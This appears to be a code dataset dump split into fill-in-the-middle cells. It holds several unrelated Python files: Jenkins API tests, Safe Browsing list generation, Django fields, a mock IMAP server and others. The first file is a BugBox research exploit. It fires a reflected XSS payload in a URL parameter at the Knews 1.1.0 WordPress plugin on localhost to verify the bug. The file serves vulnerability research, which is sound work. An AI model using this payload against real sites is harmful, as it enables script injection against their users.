repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
UMD-SEAM/bugbox | framework/Exploits/Bugtraq_54330.py | Python | bsd-3-clause | 1,719 | 0.009889 |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
import selenium.common.exceptions
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "Bugtraq_54330",
'Description' : "XSS vulnerabiity in Knews 1.1.0, a plugin for Wordpress",
'References' : [["http://www.cvedetails.com/bugtraq-bid/54330/WordPress-Knews-Multilingual-Newsletters-Plugin-Cross-Site-S.html"]],
'Target' : "Wordpress 3.2",
'TargetLicense' : '',
'Plugin' : "Knews 1.1.0",
'VulWikiPage' : "None",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://127.0.0.1/wordpress/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E")
alert = None
tries = 5
while tries:
alert = driver.switch_to_alert()
try:
text = a | lert. | text
self.verified = True
break
except NoAlertPresentException:
tries -= 1
time.sleep(1)
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
|
rtilder/shavar-list-creation | lists2safebrowsing.py | Python | mpl-2.0 | 13,448 | 0.019557 | #!/usr/bin/env python
import ConfigParser
import hashlib
import json
import os
import re
import sys
import tempfile
import time
import urllib2
import urlparse
import boto.s3.connection
import boto.s3.key
# bring a URL to canonical form as described at
# https://developers.google.com/safe-browsing/developers_guide_v2
def canonicalize(d):
if (not d or d == ""):
return d;
# remove tab (0x09), CR (0x0d), LF (0x0a)
d = re.subn("\t|\r|\n", "", d)[0];
# remove any URL fragment
fragment_index = d.find("#")
if (fragment_index != -1):
d = d[0:fragment_index]
# repeatedly unescape until no more hex encodings
while (1):
_d = d;
d = urllib2.unquote(_d);
# if decoding had no effect, stop
if (d == _d):
break;
# extract hostname (scheme://)(username(:password)@)hostname(:port)(/...)
# extract path
url_components = re.match(
re.compile(
"^(?:[a-z]+\:\/\/)?(?:[a-z]+(?:\:[a-z0-9]+)?@)?([^\/^\?^\:]+)(?:\:[0-9]+)?(\/(.*)|$)"), d);
host = url_components.group(1);
path = url_components.group(2) or "";
path = re.subn("^(\/)+", "", path)[0];
# remove leading and trailing dots
host = re.subn("^\.+|\.+$", "", host)[0];
# replace consequtive dots with a single dot
host = re.subn("\.+", ".", host)[0];
# lowercase the whole thing
host = host.lower();
# percent-escape any characters <= ASCII 32, >= 127, or '#' or '%'
_path = "";
for i in path:
if (ord(i) <= 32 or ord(i) >= 127 or i == '#' or i == '%'):
_path += urllib2.quote(i);
else:
_path += i;
# Note: we do NOT append the scheme
# because safebrowsing lookups ignore it
return host + "/" + _path;
def find_hosts(disconnect_json, allow_list, chunk, output_file, log_file,
add_content_category, name):
"""Finds hosts that we should block from the Disconnect json.
Args:
disconnect_json: A JSON blob containing Disconnect's list.
allow_list: Hosts that we can't put on the blocklist.
chunk: The chunk number to use.
output_file: A file-handle to the output file.
log_file: A filehandle to the log file.
"""
# Number of items published
publishing = 0
# Total number of bytes, 0 % 32
hashdata_bytes = 0;
# Remember previously-processed domains so we don't print them more than once
domain_dict = {};
# Array holding hash bytes to be written to f_out. We need the total bytes
# before writing anything.
output = [];
categories = disconnect_json["categories"]
for c in categories:
# Skip content and Legacy categories as necessary
if c.find("Legacy") != -1:
continue
if (c.find("Content") != -1 and not add_content_category):
continue
if log_file:
log_file.write("Processing %s\n" % c)
# Objects of type
# { Automattic: { http://automattic.com: [polldaddy.com] }}
# Domain lists may or may not contain the address of the top-level site.
for org in categories[c]:
for orgname in org:
top_domains = org[orgname]
for top in top_domains:
domains = top_domains[top]
for d in domains:
d = d.encode('utf-8');
canon_d = canonicalize(d);
if (not canon_d in domain_dict) and (not d in allow_list):
if log_file:
log_file.write("[m] %s >> %s\n" % (d, canon_d));
log_file.write("[canonicalized] %s\n" % (canon_d));
log_file.write("[hash] %s\n" % hashlib.sha256(canon_d).hexdig | est());
publishing += 1
domain_dict[canon_d] = 1;
hashdata_bytes += 32;
output.append(hashlib.sha256(canon_d).digest());
| # Write safebrowsing-list format header
if output_file:
output_file.write("a:%u:32:%s\n" % (chunk, hashdata_bytes));
output_string = "a:%u:32:%s\n" % (chunk, hashdata_bytes);
for o in output:
if output_file:
output_file.write(o);
output_string = output_string + o
print "Tracking protection(%s): publishing %d items; file size %d" \
% (name, publishing, len(output_string))
return output_string
def process_disconnect_entity_whitelist(incoming, chunk, output_file,
log_file, list_variant):
"""
Expects a dict from a loaded JSON blob.
"""
publishing = 0
urls = set()
hashdata_bytes = 0
output = []
for name, entity in sorted(incoming.items()):
name = name.encode('utf-8')
for prop in entity['properties']:
for res in entity['resources']:
prop = prop.encode('utf-8')
res = res.encode('utf-8')
if prop == res:
continue
d = canonicalize('%s/?resource=%s' % (prop, res))
h = hashlib.sha256(d)
if log_file:
log_file.write("[entity] %s >> (canonicalized) %s, hash %s\n"
% (name, d, h.hexdigest()))
urls.add(d)
publishing += 1
hashdata_bytes += 32
output.append(hashlib.sha256(d).digest())
# Write the data file
output_file.write("a:%u:32:%s\n" % (chunk, hashdata_bytes))
# FIXME: we should really sort the output
for o in output:
output_file.write(o)
output_file.flush()
output_size = os.fstat(output_file.fileno()).st_size
print "Entity whitelist (%s): publishing %d items; file size %d" \
% (list_variant, publishing, output_size)
def process_plugin_blocklist(incoming, chunk, output_file, log_file):
publishing = 0
domains = set()
hashdata_bytes = 0
output = []
for d in incoming:
canon_d = canonicalize(d.encode('utf-8'))
if canon_d not in domains:
h = hashlib.sha256(canon_d)
if log_file:
log_file.write("[plugin-blocklist] %s >> (canonicalized) %s, hash %s\n"
% (d, canon_d, h.hexdigest()))
publishing += 1
domains.add(canon_d)
hashdata_bytes += 32
output.append(hashlib.sha256(canon_d).digest())
# Write the data file
output_file.write("a:%u:32:%s\n" % (chunk, hashdata_bytes))
# FIXME: we should really sort the output
for o in output:
output_file.write(o)
output_file.flush()
output_size = os.fstat(output_file.fileno()).st_size
print "Plugin blocklist: publishing %d items; file size %d" \
% (publishing, output_size)
def chunk_metadata(fp):
# Read the first 25 bytes and look for a new line. Since this is a file
# formatted like a chunk, a end of the chunk header(a newline) should be
# found early.
header = fp.read(25)
eoh = header.find('\n')
chunktype, chunknum, hash_size, data_len = header[:eoh].split(':')
return dict(type=chunktype, num=chunknum, hash_size=hash_size, len=data_len,
checksum=hashlib.sha256(fp.read()).hexdigest())
def new_data_to_publish(config, section, blob):
# Get the metadata for our old chunk
# If necessary, fetch the existing data from S3, otherwise open a local file
if ((config.has_option('main', 's3_upload')
and config.getboolean('main', 's3_upload'))
or (config.has_option(section, 's3_upload')
and config.getboolean(section, 's3_upload'))):
conn = boto.s3.connection.S3Connection()
bucket = conn.get_bucket(config.get('main', 's3_bucket'))
s3key = config.get(section, 's3_key') or config.get(section, 'output')
key = bucket.get_key(s3key)
if key is None:
# most likely a new list
print "{0} looks like it hasn't been uploaded to s3://{1}/{2}".format(section, bucket.name, s3key)
key = boto.s3.key.Key(bucket)
key.key = s3key
key.set_contents_from_string("a:1:32:32\n" + 32 * '1')
current = tempfile.TemporaryFile()
key.get_contents_to_file(current)
current.seek(0)
else:
current = open(config.get(section, 'output'), 'rb')
old = chunk_metadata(current)
current.close()
new = chunk_metadata(blob)
if old['checksum'] != new['checksum']:
return True
return False
def main():
config = ConfigParser.ConfigParser()
filename = config.read(["shavar_list_creation.ini"])
if not filename:
sys.stderr.write("Error loading shavar_list_creation.ini\n")
sys.exit(-1)
chunknum = int(time.time())
for section in config.sections():
if |
tomka/CATMAID | django/applications/catmaid/fields.py | Python | gpl-3.0 | 15,358 | 0.002409 | # -*- coding: utf-8 -*-
import psycopg2
from psycopg2.extensions import register_adapter, adapt, AsIs
from psycopg2.extras import CompositeCaster, register_composite
import re
from typing import Any, ClassVar, Dict
from django import forms
from django.contrib.postgres.fields import ArrayField
from django.contrib.postgres.forms import SimpleArrayField
from django.core.exceptions import ValidationError
from django.dispatch import receiver, Signal
from django.db import models
from django.db.backends import signals as db_signals
from django.contrib.postgres.functions import TransactionNow
from catmaid.widgets import Double3DWidget, Integer3DWidget, RGBAWidget, DownsampleFactorsWidget
# ------------------------------------------------------------------------
# Classes to support PostgreSQL composite types. Adapted from:
# http://schinckel.net/2014/09/24/using-postgres-composite-types-in-django/
class CompositeFactory(CompositeCaster):
def make(self, values):
return self.composite_python_class(**dict(zip(self.attnames, values)))
_missing_types = {}
class CompositeMeta(type):
composite_python_class: ClassVar
def __init__(cls, name, bases, clsdict):
from django.db import connection
super().__init__(name, bases, clsdict)
cls.register_composite(connection)
def register_composite(cls, connection):
klass = cls()
db_type = klass.db_type(connection)
if db_type:
try:
cls.python_type = register_composite(
str(db_type),
| connection.cursor().cursor,
globally=True,
factory=klass.factory_class()
).type
except psycopg2.ProgrammingError:
_missing_types[db_type] = cls
else:
def adapt_composite(composite):
# For safety, `composite_python_class` must have the same
# attributes as the namedtuple `python_type`'s fields, so
| # that those can be escaped rather than relying on
# `__str__`.
return AsIs("(%s)::%s" % (
", ".join([
adapt(getattr(composite, field)).getquoted().decode('utf-8') for field in cls.python_type._fields
]), db_type
))
register_adapter(cls.composite_python_class, adapt_composite)
class CompositeField(models.Field, metaclass=CompositeMeta):
"""Base class for PostgreSQL composite fields.
Rather than use psycopg2's default namedtuple types, adapt to a custom
Python type in `composite_python_class` that takes fields as init kwargs.
"""
def factory_class(self):
newclass = type(
str('%sFactory' % type(self.composite_python_class).__name__),
(CompositeFactory,),
{'composite_python_class': self.composite_python_class})
return newclass
composite_type_created = Signal(providing_args=['name'])
# Necessary when running in interactive contexts and from migrations.
@receiver(composite_type_created)
def register_composite_late(sender, db_type, **kwargs):
from django.db import connection
_missing_types.pop(db_type).register_composite(connection)
# Necessary when running in a parallel context (production, test suites).
@receiver(db_signals.connection_created)
def register_composite_connection_created(sender, connection, **kwargs):
for subclass in CompositeField.__subclasses__():
subclass.register_composite(connection)
# ------------------------------------------------------------------------
# Classes to support the integer3d compound type:
class Integer3D(object):
def __init__(self, x=0, y=0, z=0):
self.x, self.y, self.z = x, y, z
integer_re = '[-+0-9]+'
tuple_pattern = re.compile(r'^\((%s),\s*(%s),\s*(%s)\)$' % (integer_re, integer_re, integer_re))
@classmethod
def from_str(cls, s):
m = cls.tuple_pattern.match(s)
if m:
return Integer3D(x=int(m.group(1), 10),
y=int(m.group(2), 10),
z=int(m.group(3), 10))
else:
raise ValidationError("Couldn't parse value as an Integer3D: " + str(s))
def __eq__(self, other):
return isinstance(other, Integer3D) and self.x == other.x and self.y == other.y and self.z == other.z
def __str__(self):
return "(%d, %d, %d)" % (self.x, self.y, self.z)
def to_dict(self) -> Dict[str, Any]:
return {'x': self.x, 'y': self.y, 'z': self.z}
class Integer3DField(CompositeField):
composite_python_class = Integer3D
def formfield(self, **kwargs):
defaults = {'form_class': Integer3DFormField}
defaults.update(kwargs)
return super().formfield(**defaults)
def db_type(self, connection):
return 'integer3d'
def to_python(self, value):
if isinstance(value, Integer3D):
return value
elif (isinstance(value, list) or isinstance(value, tuple)) and len(value) == 3:
return Integer3D(value[0], value[1], value[2])
# When contructing a Location, we get the empty string
# here; return a new Integer3D for any falsy value:
elif not value:
return Integer3D()
else:
return Integer3D.from_str(value)
def get_db_prep_value(self, value, connection, prepared=False):
return self.to_python(value)
# ------------------------------------------------------------------------
# Classes to support the double3d compound type:
class Double3D(object):
def __init__(self, x=0, y=0, z=0):
self.x, self.y, self.z = x, y, z
double_re = r'[-+0-9\.Ee]+'
tuple_pattern = re.compile(r'^\((%s),\s*(%s),\s*(%s)\)$' % (double_re, double_re, double_re))
@classmethod
def from_str(cls, s):
m = cls.tuple_pattern.match(s)
if m:
return Double3D(x=float(m.group(1)),
y=float(m.group(2)),
z=float(m.group(3)))
else:
raise ValidationError("Couldn't parse value from the database as a Double3D: " + str(s))
def __str__(self):
return u"(%.3f, %.3f, %.3f)" % (self.x, self.y, self.z)
class Double3DField(models.Field):
def formfield(self, **kwargs):
defaults = {'form_class': Double3DFormField}
defaults.update(kwargs)
return super().formfield(**defaults)
def db_type(self, connection):
return 'double3d'
def from_db_value(self, value, expression, connection):
if value is None:
return value
return Double3D.from_str(value)
def to_python(self, value):
if isinstance(value, Double3D):
return value
elif (isinstance(value, list) or isinstance(value, tuple)) and len(value) == 3:
return Double3D(value[0], value[1], value[2])
# When contructing a Location, we get the empty string
# here; return a new Double3D for any falsy value:
elif not value or value == '(,,)':
return Double3D()
else:
return Double3D.from_str(value)
def get_db_prep_value(self, value, connection, prepared=False):
value = self.to_python(value)
return "(%f,%f,%f)" % (value.x, value.y, value.z)
# ------------------------------------------------------------------------
# Classes to support the rgba compound type:
class RGBA(object):
def __init__(self, r=0, g=0, b=0, a=0):
self.r, self.g, self.b, self.a = r, g, b, a
double_re = r'[-+0-9\.Ee]+'
tuple_pattern = re.compile(r'^\((%s),\s*(%s),\s*(%s),\s*(%s)\)$' % (double_re, double_re, double_re, double_re))
@classmethod
def from_str(cls, s):
m = cls.tuple_pattern.match(s)
if m:
return RGBA(r=float(m.group(1)),
g=float(m.group(2)),
b=float(m.group(3)),
a=float(m.group(4)))
else:
raise ValidationError("Couldn't parse value as |
AlpacaDB/chainer | chainer/testing/helper.py | Python | mit | 829 | 0 | import pkg_resources
import unittest
def with_requires(*requirements):
"""Run a test case only when given requirements are satisfied.
.. admonition:: Example
This test case runs only when `numpy>=1.10` is | installed.
>>> from chainer import testing
... class Test(unittest.TestCase):
... @testing.with_requires('numpy>=1.10')
... def test_for_numpy_1_10(self):
... pass
Args:
requirements: A list of string representing requirement condition to
run a given test case.
"""
ws = pkg_resources.WorkingSe | t()
try:
ws.require(*requirements)
skip = False
except pkg_resources.VersionConflict:
skip = True
msg = 'requires: {}'.format(','.join(requirements))
return unittest.skipIf(skip, msg)
|
elakamarcus/python | class-inheritance_02.py | Python | gpl-3.0 | 3,445 | 0.004354 | #!/bin/python3
class SpaceShip:
def __init__(self, id, health, x, y):
self.id = id
self.health = int(health)
self.x = x
self.y = y
def __del__(self):
print("{} was destroyed.".format(self.id))
del self
def takeDMG(self, hit):
self.health -= hit
if self.health < 0:
del self
def isAlive(self):
if(self.health >= 0):
return True
return False
def isDead(self):
if(self.health <= 0):
return True
return False
def recvHealing(self, hp):
self.health += hp
def shipID(self):
print("|------------------")
print("| Ship ID : {}".format(self.id))
print("| Ship health : {}%".format(self.health))
| print("| Ship location: {}, {}".format(self.x, self.y))
print("|------------------")
class Destroyer(SpaceShip):
def __init__(self, id, health, x, y, weapon, ammo):
super().__init__(id, health, x, y)
self.weapon = weapon
self.ammo = ammo
self.shipclass = "Destroyer"
self.damagerate = 30
def shipinfo(self):
print("|---Destroyer class ship info")
print("| Ship ID :", self.id)
print( | "| Ship type :", self.shipclass)
print("| Ship location: ({}, {})".format(self.x, self.y))
print("| Ship armament:", self.weapon)
print("| Ship ammo : {}%".format(self.ammo))
print("| Ship health : {}%".format(self.health))
print("|----------------------------")
def attackDMG(self, targetship):
print("|---------Attack----------")
print("| {} is firing {} at {}, causing {} damage".format(self.id, self.weapon, targetship.id, self.damagerate))
targetship.takeDMG(30)
self.ammo -= 1
print("| {} has {} hp remaining".format(targetship.id, targetship.health))
print("|-------------------------")
class Medic(SpaceShip):
def __init__(self, id, health, x, y, healingrate):
super().__init__(id, health, x, y)
self.healingrate = healingrate
self.shipclass = "Medic"
def shipinfo(self):
print("|---Medic class ship info")
print("| Ship ID :", self.id)
print("| Ship type :", self.shipclass)
print("| Ship location: ({}, {})".format(self.x, self.y))
print("| Ship healing : {} hp/s".format(self.healingrate))
print("| Ship health : {}%".format(self.health))
print("|-------------------------")
def giveHealing(self, ship):
print("|---------Healing---------")
print("| {} is healing {} with {} HP".format(self.id, ship.id, self.healingrate))
ship.recvHealing(self.healingrate)
print("| {}'s health is now {}".format(ship.id, ship.health))
print("|-------------------------")
def __del__(self):
print("{} was destroyed and is no more.".format(self.id))
del self
def spaceMain():
x = Destroyer("Foehammer", 100, 14, 48, "Photon torpedoes", 78)
x.shipinfo()
#x.shipinfo()
y = Medic("Pathways", 100, 13, 50, 50)
y.shipID()
#y.shipID()
#y.shipinfo()
for a in range(5):
x.attackDMG(y)
# while(True):
# x.attackDMG(y)
# if(y.health < 0):
# y.__del__()
# break
def main():
spaceMain()
if __name__ == '__main__':
spaceMain() |
jduan/jenkinsapi | jenkinsapi_tests/unittests/test_nodes.py | Python | mit | 8,323 | 0.000481 | import mock
# To run unittests on python 2.6 please use unittest2 library
try:
import unittest2 as unittest
except ImportError:
import unittest
from jenkinsapi.jenkins import Jenkins
from jenkinsapi.nodes import Nodes
from jenkinsapi.node import Node
class TestNode(unittest.TestCase):
DATA0 = {
'assignedLabels': [{}],
'description': None,
'jobs': [],
'mode': 'NORMAL',
'nodeDescription': 'the master Jenkins node',
'nodeName': '',
'numExecutors': 2,
'overallLoad': {},
'primaryView': {'name': 'All', 'url': 'http: | //halob:8080/'},
'quietingDown': False,
'slaveAgentPort': 0,
'unlabeledLoad': {},
'useCrumbs': False,
'useSecurity': False,
'views': [
{'name': 'All', 'url': 'http://halob:8080/'},
{'name': 'FodFanFo', 'url': 'http://halob:8080/view/FodFanFo/'}
]
}
DATA1 = {
'busyExecutors': 0,
'computer': [
{
'actions': [],
'displayName': 'master | ',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671924924416
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 3174686720,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671924924416
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'bobnit',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 4261},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/home/sal/jenkins',
'size': 169784860672
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 29},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 4570710016,
'availableSwapSpace': 12195983360,
'totalPhysicalMemory': 8374497280,
'totalSwapSpace': 12195983360
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 249737277440
}
},
'numExecutors': 1,
'offline': True,
'offlineCause': {},
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None
},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
],
'displayName': 'nodes',
'totalExecutors': 2
}
DATA2 = {
'actions': [],
'displayName': 'master',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671942561792
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 2989916160,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671942561792
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
DATA3 = {
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(Nodes, '_poll')
def setUp(self, _poll_nodes, _poll_jenkins):
_poll_jenkins.return_value = self.DATA0
_poll_nodes.return_value = self.DATA1
# def __init__(self, baseurl, nodename, jenkins_obj):
self.J = Jenkins('http://localhost:8080')
self.ns = self.J.get_nodes()
# self.ns = Nodes('http://localhost:8080/computer', 'bobnit', self.J)
def testRepr(self):
# Can we produce a repr string for this object
repr(self.ns)
def testCheckURL(self):
self.assertEquals(self.ns.baseurl, 'http://localhost:8080/computer')
@mock.patch.object(Node, '_poll')
def testGetMasterNode(self, _poll_node):
_poll_node.return_value = self.DATA2
mn = self.ns['master']
self.assertIsInstance(mn, Node)
@mock.patch.object(Node, '_poll')
def testGetNonMasterNode(self, _poll_node):
_poll_node.r |
OpenSight/StreamSwitch | controller/python/streamswitch/wsgiapp/models.py | Python | agpl-3.0 | 6,163 | 0.003894 | """
streamswitch.wsgiapp.models
~~~~~~~~~~~~~~~~~~~~~~~
This module implements the domain models for the WSGI application,
based on the SQLAlchemy's ORM
:copyright: (c) 2015 by OpenSight (www.opensight.cn).
:license: AGPLv3, see LICENSE for more details.
"""
from __future__ import unicode_literals, division
from sqlalchemy import Column, Integer, String, Float, Text, \
orm
from sqlalchemy.ext.declarative import declarative_base
from ..stream_mngr import DEFAULT_LOG_ROTATE, DEFAULT_LOG_SIZE
from ..utils import STRING, encode_json
import json
from ..sender_mngr import LOG_LEVEL_INFO
Base = declarative_base()
class StreamConf(Base):
""" The SQLAlchemy declarative model class for a Stream config object. """
__tablename__ = 'stream_confs'
source_type = Column(String(convert_unicode=True), nullable=False)
stream_name = Column(String(convert_unicode=True), primary_key=True, nullable=False)
url = Column(String(convert_unicode=True), nullable=False)
api_tcp_port = Column(Integer, server_default="0", nullable=False)
log_file = Column(String(convert_unicode=True))
log_size = Column(Integer, server_default="1048576", nullable=False)
log_rotate = Column(Integer, server_default="3", nullable=False)
err_restart_interval = Column(Float, server_default="30.0", nullable=False)
age_time = Column(Float, server_default="0.0", nullable=False)
extra_options_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
other_kwargs_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
def __init__(self, source_type, stream_name, url, api_tcp_port=0, log_file=None, log_size=DEFAULT_LOG_SIZE,
log_rotate=DEFAULT_LOG_ROTATE, err_restart_interval=30.0, age_time=0.0, extra_options={}, **kwargs):
# config
self.stream_name = STRING(stream_name)
self.source_type = STRING(source_type)
self.url = STRING(url)
self.api_tcp_port = int(api_tcp_port)
if log_file is not None:
self.log_file = STRING(log_file)
else:
self.log_file = None
self.log_size = int(log_size)
self.log_rotate = int(log_rotate)
self.err_restart_interval = float(err_restart_interval)
self.age_time = float(age_time)
self.extra_options = dict(extra_options)
self.extra_options_json = STRING(encode_json(self.extra_options))
self.other_kwargs = dict(kwargs)
self.other_kwargs_json = STRING(encode_json(self.other_kwargs))
@orm.reconstructor
def init_on_load(self):
self.extra_options = json.loads(self.extra_options_json)
self.other_kwargs = json.loads(self.other_kwargs_json)
# print("init_on_load")
def __repr__(self):
return "StreamConf Object(stream_name:%s, source_type:%s, " \
"url:%s, api_tcp_port:%d)" % (
self.stream_name, self.source_type, self.url, self.api_tcp_port
)
class SenderConf(Base):
""" The SQLAlchemy declarative model class for a Sender config object. """
__tablename__ = 'sender_confs'
sender_type = Column(String(convert_unicode=True), nullable=False)
sender_name = Column(String(convert_unicode=True), primary_key=True, nullable=False)
dest_url = Column(String(convert_unicode=True), nullable=False)
dest_format = Column(String(convert_unicode=True), server_default="", nullable=False)
stream_name = Column(String(convert_unicode=True), server_default="", nullable=False)
stream_host = Column(String(convert_unicode=True), server_default="", nullable=False)
stream_port = Column(Integer, server_default="0", nullable=False)
log_file = Column(String(convert_unicode=True))
log_size = Column(Integer, server_default="1048576", nullable=False)
log_rotate = Column(Integer, server_default="3", nullable=False)
log_level = Column(Integer, server_default="%d" % LOG_LEVEL_INFO, nullable=False)
err_restart_interval = Column(Float, server_default="30.0", nullable=False)
age_time = Column(Float, server_default="0.0", nullable=False)
extra_options_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
other_kwargs_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
def __init__(self, sender_type, sender_name, dest_url, dest_format="", stream_name="", stream_host="", stream_port=0,
log_file=None, log_size=DEFAULT_LOG_SIZE, log_rotate=DEFAULT_LOG_ROTATE, log_level=LOG_LEVEL_INFO,
err_restart_interval=30.0, age_time=0.0, extra_options={}, event_listener=None,
**kwargs):
# config
self.sender_name = STRING(sender_name)
self.sender_type = STRING(sender_type)
self.dest_url = STRING(dest_url)
self.dest_format = STRING(dest_format)
self.stream_name = STRING(stream_name)
self.stream_host = STRING(stream_host)
self.stream_port = int(stream_port)
if log_file is not None:
self.log_file = STRING(log_file)
else:
self.log_file = None
self.log_size = int(log_size)
self.log_rotate = int(log_rotate)
self.log_level = int(log_level)
self.err_restart_interval = float(err_restart_interval)
self.extra_options = dict(extra_options)
self.age_time = float(age_time)
self.extra_options = dict(extra_options)
self.extra_options_json = STRING(encode_json(self.extra_options))
self.other_kwargs = dict(kwargs)
self.other_kwargs_json = STRING(encode_json(self.other_kwargs))
@orm.reconstructor
def init_on_load(self):
self.extra_options = json.loads(self. | extra_option | s_json)
self.other_kwargs = json.loads(self.other_kwargs_json)
# print("init_on_load")
def __repr__(self):
return "SenderConf Object(sender_name:%s, sender_type:%s, " \
"dest_url:%s, stream_name:%s, stream_host:%s, stream_port:%d)" % (
self.sender_name, self.sender_type, self.dest_url,
self.stream_name, self.stream_host, self.stream_port
) |
andrewzwicky/puzzles | CodeEval/test_challenge_7.py | Python | mit | 289 | 0.00346 | from unittest import TestCase
from CodeEval.challenge_7 import chal | lenge
class Chall | enge7Test(TestCase):
def test_input_1(self):
self.assertEqual(5, challenge("- * / 15 - 7 + 1 1 3 + 2 + 1 1"))
def test_input_2(self):
self.assertEqual(20, challenge("* + 2 3 4")) |
web2py/pydal | pydal/contrib/mockimaplib.py | Python | bsd-3-clause | 10,686 | 0.001684 | # -*- encoding: utf-8 -*-
from imaplib import ParseFlags
# mockimaplib: A very simple mock server module for imap client APIs
# Copyright (C) 2014 Alan Etkin <spametki@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or(at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/lgpl.html>
"""
mockimaplib allows you to test applications connecting to a dummy imap
service. For more details on the api subset implemented,
refer to the imaplib docs.
The client should configure a dictionary to map imap string queries to sets
of entries stored in a message dummy storage dictionary. The module includes
a small set of default message records (SPAM and MESSAGES), two mailboxes
(Draft and INBOX) and a list of query/resultset entries (RESULTS).
Usage:
>>> import mockimaplib
>>> connection = mockimaplib.IMAP4_SSL(<host>)
>>> connection.login(<user>, <password>)
None
>>> connection.select("INBOX")
("OK", ... <mailbox length>)
# fetch commands specifying single uid or message id
# will try to get messages recorded in SPAM
>>> connection.uid(...)
<search query or fetch result>
# returns a string list of matching message ids
>>> connection.search(<query>)
("OK", ... "1 2 ... n")
"""
MESSAGES = (
"MIME-Version: 1.0\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:52:30 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:52:30 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <10101010101010010000010101010001010101001010010000001@mail.example.com>\r\nSubject: spam1\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse!\r\n\r\n\r\n",
